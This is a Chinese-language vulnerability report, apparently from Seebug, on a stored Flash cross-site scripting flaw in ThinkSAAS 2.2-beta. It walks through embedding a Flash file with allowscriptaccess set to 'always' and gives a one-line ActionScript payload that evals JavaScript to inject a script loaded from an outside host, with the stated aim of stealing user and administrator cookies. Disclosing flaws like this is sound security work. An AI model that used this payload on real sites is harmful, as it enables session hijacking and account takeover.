### 简要描述:
ThinkSAAS存在存储型跨站,可攻击任意用户或盲打管理员,盗取用户cookie等等
### 详细说明:
ThinkSAAS对文章内容过滤不严,导致存在存储型的Flash跨站。由于Flash文件可以执行任意脚本,利用此漏洞我们可以盗取任意用户(包括管理员)的cookie信息,或进行其它恶意攻击。
### 漏洞证明:
1、涉及版本:thinksaas2.2-beta
2、登录系统,在文章模块发布文章,在内容处选择插入视频并输入flash文件路径。
[<img src="https://images.seebug.org/upload/201411/27142320ba7029b512ad0fa12e09f074d1fef2ba.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/27142320ba7029b512ad0fa12e09f074d1fef2ba.png)
[<img src="https://images.seebug.org/upload/201411/271423344681e24e344edc4331c346fe3ac34324.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/271423344681e24e344edc4331c346fe3ac34324.png)
3、拦截请求,将<embed>标签的allowscriptaccess属性值改为always
[<img src="https://images.seebug.org/upload/201411/271424512dce6c660db3854be749de662420b715.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/271424512dce6c660db3854be749de662420b715.png)
4、其它用户登录系统,查看文章时,漏洞触发:
[<img src="https://images.seebug.org/upload/201411/27142531573f2bbf8f5a208f4c4c93cc4d90bace.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/27142531573f2bbf8f5a208f4c4c93cc4d90bace.png)
5、使用Firebug查看页面源文件,allowscriptaccess属性值为always,可以执行任意脚本文件。
[<img src="https://images.seebug.org/upload/201411/2714264965fbd519eb7ee5ecb4eb32fdf801d564.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/2714264965fbd519eb7ee5ecb4eb32fdf801d564.png)
6、修改flash文件的内容为:import flash.external.ExternalInterface;
ExternalInterface.call("eval","d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);"); 漏洞执行时,可成功加载本地脚本文件。
[<img src="https://images.seebug.org/upload/201411/27142925df24e651c6df9d0bf5846d23a8c91fc9.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/27142925df24e651c6df9d0bf5846d23a8c91fc9.png)
修改脚本文件利用代码可进行针对性的攻击。
7、管理员查看文章时,漏洞触发,可以盗取管理员cookie
[<img src="https://images.seebug.org/upload/201411/2714302068326aeabc8c8a852d2f9f78bc2fb16f.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/2714302068326aeabc8c8a852d2f9f78bc2fb16f.png)
暂无评论